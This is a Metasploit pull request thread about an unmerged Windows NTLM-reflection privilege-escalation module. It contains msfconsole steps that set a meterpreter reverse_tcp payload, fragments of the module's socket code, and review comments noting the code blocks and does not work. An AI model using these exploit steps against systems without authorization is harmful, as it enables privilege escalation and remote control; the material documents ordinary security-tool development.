### PR TITLE
Windows Local Priv NTLM Reflection

### PR DESCRIPTION
**Pull request by iliaselmatani**
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/windows/local/one_day`
- [x] `set session 1`
- [x] `set payload windows/meterpreter/reverse_tcp`
- [x] `exploit -j`

### CODE REVIEW

**Comment by Meatballs1** [comment]
How are you triggering the connection to the listening port?

**Comment by iliaselmatani** [comment]
You should set the session to run this module on.
For e.g.: msf exploit (one_day) > set session 1

**Comment by OJ** [comment]
I was looking at this module the other day as well after seeing it posted on Twitter. We'll need to tidy it up quit a bit before landing. I also think we can do a few things with the socket code to make it rely less on Railgun and more on core TCP functionality.

Fantastic start though!

@iliaselmatani in future it's probably better to avoid submitting PR's through github's web interface. It comes with potential issues.

**Comment by vvalien** [comment]
I would have committed this a few months ago, but there was a few reasons I didn't. The main one obviously being no patch, the other was having to rely on ws2_32 for the listening port. To the best of my knowledge its the only post/local_exploit module that uses a listening port. Also want to add the etw code by itself or as its own module.

**Comment by thesle3p** [comment]
Any time frame on committing this?

**Comment by wwebb-r7** [comment]
This thing is like an albatross all the way down here at the bottom.  Anything that can be done to land or close it?

**Comment by pbarry-r7** [comment]
Oof, yeah, I have a couple Windows VM set up in a domain that I was gonna verify this with.  Will circle back on this one and give it some attention+closure.

**Comment by wwebb-r7** [comment]
If you can't find the time I can see about it ... I'm just on a personal vendetta against all remaining 2016 pr's

**Comment by pbarry-r7** [comment]
I certainly can appreciate that bent, @wwebb-r7.  Your Windows Fu is stronger than mine, I'm sure you could make quicker work of it.  I'll plan on poking on it, but if you find time/interest to look at it before I reassign myself, please grab it.  TY!

File: modules/exploits/windows/local/one_day.rb [hunk 1]
```diff
@@ -0,0 +1,314 @@
...
+    r = client.railgun.ws2_32.bind(sock, sock_addr, 16)
+    print_status("Socket bind with ws2_32")
+    # Set the name here so we can kill it later!
+    # random_service = Rex::Text.rand_text_alpha((rand(8)+6))
+    begin
+      # proc_start(random_service)
+      # print_status("Process Started")
+      r = client.railgun.ws2_32.listen(sock, 10)
+      print_status("Socket is now listening on #{datastore['LocalHost']} we are waiting for a connect")
+      r = client.railgun.ws2_32.accept(sock, nil, nil)
```
Comment (sempervictus) [inline modules/exploits/windows/local/one_day.rb]: This needs to happen asynchronously as the module blocks here, and never actually gets to assign @n_sock or run railgun_recv_smb_do

File: modules/exploits/windows/local/one_day.rb [hunk 2]
```diff
@@ -0,0 +1,314 @@
...
+##
+require 'rex'
+require 'msf/core'
+
+# Removed some things that should be included...
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  # errors with remove_socket
+  # include Msf::Exploit::Remote::SMB::Client::Psexec
+  include Rex::Constants::Windows
```
Comment (sempervictus) [inline modules/exploits/windows/local/one_day.rb]: This doesnt exist anymore, i believe it is now Msf::Exploit::Windows_Constants (right?).

**Comment by sempervictus** [comment]
@wwebb-r7: I've had PRs open for at least a year boss, some of us are vicious haters who make the R7 staff have to decide direction of core components before they planned to ;-). In all seriousness though, having read over this it looks pretty interesting, but initial testing in on our target range shows that execution flow is broken on the _client.railgun.ws2_32.accept_ call since it blocks, preventing creation of the client socket connecting to it for the requested acceptance.
@vvalien: could you take a look at my inline notes and potentially rebase on current master?

**Comment by wwebb-r7** [comment]
@sempervictus no worries, turns out I never have as much free time as I think I do anyways.

I actually started work on porting the native DNS pr to current awhile back.  Some big stupid named vuln or such happened though and that port will probably need another layer of porting before being ported to current-current.

**Comment by sempervictus** [comment]
@wweb-r7: That PR is live in our fork, so it works as originally intended, although with some divergence from master in all sorts of places. I do want to replace all internal gethostbyname calls with it, but that makes for some fun dependency graphs... Far as this PR goes, I can check in on occasion to work with the author if you'd like.

**Comment by wwebb-r7** [comment]
@sempervictus  I don't see myself being able to work on it in the immediate future, but you might want to sync up with @bcook-r7 and get his current thoughts and suggestions on it.  I was only retooling the cog, while he knows the machine, or whatever they say.  It's been awhile now, but I'll make a point to dig up what I finished and see if it's worth continuing or best to just start over maybe next week.

**Comment by egypt** [comment]
Has anyone come back to this? @sempervictus do you have ideas on how to deal with the `accept` issue you brought up?

**Comment by sempervictus** [comment]
Adding this to list for weekend. Sorry slipped through the plethora of cracks.

**Comment by dummys** [comment]
Hi, still no news for this pR ?

**Comment by fsacer** [comment]
some work was done here https://github.com/realoriginal/reflectivepotato by @realoriginal

**Comment by realoriginal** [comment]
Not quite sure why I didnt get a notif till now but here I am. Yeah I wanted to port it to support reflection and HOPEFULLY if i can fix the bloody issues PR it to Metasploit. I would've had it done by now, but i have a massive problem with getting the shellcode to run as SYSTEM, even with a working handle to one. Admittedly, I know very little about Windows API calls which is why I'm struggling. I'd be happy to PR it though? @fsacer @busterb

**Comment by realoriginal** [comment]
As of late you'll still need incognito to impersonate the SYSTEM token.

**Comment by fsacer** [comment]
https://github.com/rapid7/metasploit-framework/pull/10418

**Comment by fsacer** [comment]
Is this PR still needed as https://github.com/rapid7/metasploit-framework/pull/10418 has already been merged?

**Pull request closed without merging**